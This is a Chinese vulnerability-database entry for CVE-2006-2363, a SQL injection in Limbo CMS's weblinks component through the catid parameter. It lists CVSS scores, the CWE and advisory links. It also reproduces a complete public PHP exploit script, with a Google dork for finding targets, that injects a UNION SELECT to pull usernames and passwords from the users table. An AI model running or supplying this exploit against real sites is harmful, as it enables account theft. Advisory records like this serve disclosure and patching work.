CVE-2006-2363
CVSS5.1
发布时间 :2006-05-15 12:06:00
修订时间 :2008-09-05 17:04:20
NMCOE    

[原文]SQL injection vulnerability in the weblinks option (weblinks.html.php) in Limbo CMS allows remote attackers to execute arbitrary SQL commands via the catid parameter.


[CNNVD] Limbo CMS weblinks选项 SQL注入漏洞(CNNVD-200605-273)

         Limbo CMS的weblinks选项(weblinks.html.php)存在SQL注入漏洞。远程攻击者可以借助catid参数执行任意SQL 指令。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-89| CWE-16 []

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2363
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2363
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-273
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/19891
(VENDOR_ADVISORY)  SECUNIA  19891
http://forum.limboforge.org/index.php?topic=6.0
(PATCH)  CONFIRM  http://forum.limboforge.org/index.php?topic=6.0
http://xforce.iss.net/xforce/xfdb/26366
(UNKNOWN)  XF  limbocms-index-sql-injection(26366)
http://www.securityfocus.com/archive/1/archive/1/433221/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060507 Limbo CMS (option=weblinks) SQL injection exploit
http://milw0rm.com/exploits/1751
(UNKNOWN)  MILW0RM  1751
http://securityreason.com/securityalert/893
(UNKNOWN)  SREASON  893

- 漏洞信息

Limbo CMS weblinks选项 SQL注入漏洞
中危 SQL注入
2006-05-15 00:00:00 2007-10-29 00:00:00
远程  
         Limbo CMS的weblinks选项(weblinks.html.php)存在SQL注入漏洞。远程攻击者可以借助catid参数执行任意SQL 指令。

- 公告与补丁

        

- 漏洞信息 (1751)

Limbo CMS <= 1.0.4.2 (catid) Remote SQL Injection Exploit (EDBID:1751)
php webapps
2006-05-05 Verified
0 [Oo]
N/A [点击下载]
<pre>
[i] Limbo CMS (option=weblinks) sql injection exploit
[i] coded by [Oo]
<?php

if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id'])))
{
?>	
[*] Usage: <?echo htmlentities($PHP_SELF)?>?host=[hostname]&path=[limbo_path]&id=[user_id]
[*] Exemple: <?echo htmlentities($PHP_SELF)?>?host=127.0.0.1&path=/limbo&id=1

[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"	
<?php
die;
}

$host = $_GET['host'];
$path = $_GET['path'];
$id = $_GET['id'];

$success = 0;

$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) {
   die("[-] Connection Error!");
} 
else {

   $out = "GET $path/index.php?option=weblinks&Itemid=44&catid=-1%20union%20select%200,1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11%20from%20lm_users%20where%20id=$id/* HTTP/1.1\r\n";
   $out .= "Host: $host\r\n";
   $out .= "Connection: Close\r\n\r\n";

   fwrite($fp, $out);
   while (!feof($fp)) {
	   $f = fgets($fp, 1024);
       if ( (preg_match("/<div class=\"componentheading\" >/",$f)) && (preg_match("/login/",$f)) )
       {
			echo "$f";
			echo "[+] Enjoy! :><br>";
			$success = 1;
	   }
   }
   fclose($fp);
   
   if (!$success)
	echo "<br>[-] exploit failed :<<br>";
}
?> 
</pre>

# milw0rm.com [2006-05-05]
		

- 漏洞信息

25682
Limbo CMS weblinks.html.php catid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Limbo CMS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'weblinks.html.php' not properly sanitizing user-supplied input to the 'catid' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

- 时间线

2006-05-07 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站